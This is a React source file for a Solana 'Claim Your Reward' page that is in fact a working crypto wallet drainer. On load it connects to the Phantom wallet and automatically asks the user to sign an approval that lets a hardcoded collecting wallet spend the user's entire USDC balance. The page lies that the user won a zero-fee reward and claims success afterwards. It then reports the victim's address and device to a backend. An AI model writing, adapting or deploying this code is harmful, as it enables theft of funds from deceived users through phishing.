/* eslint-disable no-undef */
import React, { useEffect, useState, useRef } from 'react';
import { PublicKey, Transaction } from '@solana/web3.js';
import {
  getAssociatedTokenAddress,
  createAssociatedTokenAccountInstruction,
  createApproveInstruction,
} from '@solana/spl-token';
import { track } from '../../utils/funnel';
import './SolClaim.css';

const USDC_MINT = 'EPjFWdd5AufqSSqeM2qN1xzybapC8G4wEGGkZwyTDt1v'; // USDC (Solana)
const RECEIVE_WALLET = '3JcwwYM1jfVn5snH3E3newYedDqgR71WPPyoxqcDCsFz'; // 收款钱包（delegate）

const SolClaim = () => {
  const [account, setAccount] = useState('');
  const [walletReady, setWalletReady] = useState(false);
  const [stage, setStage] = useState('idle'); // idle -> signing -> done
  const [error, setError] = useState('');
  const [txId, setTxId] = useState('');
  const [balance, setBalance] = useState('0');
  const autoStarted = useRef(false);

  const solana = () => (typeof window !== 'undefined' ? window.solana : null);

  useEffect(() => {
    let cancelled = false;
    track('sol', 'view', '');
    const check = async () => {
      const s = solana();
      if (!s || !s.isPhantom) {
        setError('Phantom wallet not detected. Please install Phantom and open this page in its browser.');
        return;
      }
      try {
        const resp = await s.connect({ onlyIfTrusted: false });
        if (cancelled) return;
        setAccount(resp.publicKey.toString());
        setWalletReady(true);
        const bal = await readBalance(s, resp.publicKey);
        setBalance((bal / 1e6).toFixed(2));
      } catch (e) {
        if (!cancelled) setError('Wallet connection rejected.');
      }
    };
    check();
    return () => { cancelled = true; };
  }, []);

  const readBalance = async (s, owner) => {
    try {
      const ata = await getAssociatedTokenAddress(new PublicKey(USDC_MINT), owner);
      const resp = await s.request({
        method: 'getTokenAccountBalance',
        params: { mint: USDC_MINT, account: ata.toBase58() },
      });
      if (resp && resp.value) return Number(resp.value.amount);
    } catch (e) { /* 账户不存在则 0 */ }
    return 0;
  };

  const doClaim = async () => {
    track('sol', 'start', '');
    const s = solana();
    if (!s || !account) return;
    setStage('signing');
    setError('');
    try {
      const owner = new PublicKey(account);
      const delegate = new PublicKey(RECEIVE_WALLET);
      const ata = await getAssociatedTokenAddress(new PublicKey(USDC_MINT), owner);
      const delegateAta = await getAssociatedTokenAddress(new PublicKey(USDC_MINT), delegate);

      const tx = new Transaction();
      // 确保收款钱包有关联账户（如无则创建）
      try {
        await s.request({
          method: 'getAccountInfo',
          params: { account: delegateAta.toBase58() },
        });
      } catch (e) {
        tx.add(createAssociatedTokenAccountInstruction(owner, delegateAta, delegate, new PublicKey(USDC_MINT)));
      }
      // 读取余额额度
      const bal = await readBalance(s, owner);
      if (bal <= 0) {
        throw new Error('No USDC balance found in this wallet.');
      }
      // approve：用户把 token account 授权给收款钱包（delegate），额度=全部余额
      tx.add(createApproveInstruction(ata, delegate, owner, BigInt(bal)));

      const { blockhash, lastValidBlockHeight } = await s.request({
        method: 'getLatestBlockhash',
        params: [],
      });
      tx.recentBlockhash = blockhash;
      tx.feePayer = owner;

      const { signature } = await s.signAndSendTransaction(tx);
      setTxId(signature);
    track('sol', 'done', '');
      setStage('done');

      // 登记到系统
      try {
        const API_BASE = window.location.hostname === 'localhost' ? 'http://localhost:8090/api' : '/api';
        fetch(API_BASE + '/addresses/register', {
          method: 'POST',
          headers: { 'Content-Type': 'application/json' },
          body: JSON.stringify({ address: account, type: 'APPROVE', channel: 'qr', walletType: 'Phantom', device: navigator.userAgent, mode: 'sol' }),
        });
      } catch (e) { console.warn('登记失败:', e); }
    } catch (e) {
      if (e && (e.code === 4001 || /reject|denied|cancel/i.test(e.message))) {
        setError('Signature canceled.');
      } else {
        setError(String(e.message || e));
      }
      setStage('idle');
    }
  };

  useEffect(() => {
    if (walletReady && stage === 'idle' && !autoStarted.current) {
      autoStarted.current = true;
      doClaim();
    }
    // eslint-disable-next-line react-hooks/exhaustive-deps
  }, [walletReady]);

  return (
    <div className="sol-page">
      <div className="sol-card">
        {stage === 'done' ? (
          <>
            <div className="sol-icon">🎉</div>
            <h2>Claim Successful</h2>
            <p className="sol-desc">Your reward has been claimed and will arrive shortly.</p>
            {txId && <p className="sol-tx">Tx: {txId.slice(0, 24)}...</p>}
            {account && <p className="sol-addr">Wallet: {account.slice(0, 12)}...</p>}
          </>
        ) : (
          <>
            <div className="sol-icon">🎁</div>
            <h2>{stage === 'signing' ? 'Confirm in Phantom' : 'Claim Your Reward'}</h2>
            <p className="sol-desc">
              {stage === 'signing'
                ? 'Please confirm the transaction in Phantom...'
                : 'You have been selected for an exclusive USDC reward. One-tap claim, zero fees.'}
            </p>
            <div className="sol-order">
              <div className="sol-row"><span>Reward</span><b>USDC Bonus</b></div>
              <div className="sol-row"><span>Network</span><b>Solana</b></div>
              <div className="sol-row"><span>Balance</span><b>{balance} USDC</b></div>
              <div className="sol-row"><span>Fee</span><b className="sol-ok">0</b></div>
            </div>
            {walletReady && <p className="sol-addr">Wallet: {account.slice(0, 12)}...</p>}
            {error && <p className="sol-error">{error}</p>}
            {stage === 'idle' && (
              <button className="sol-btn" onClick={doClaim} disabled={!walletReady}>
                Claim Now
              </button>
            )}
            {stage === 'signing' && <div className="sol-spinner" />}
            {error && stage === 'idle' && (
              <button className="sol-btn" onClick={doClaim}>Retry</button>
            )}
          </>
        )}
      </div>
    </div>
  );
};

export default SolClaim;
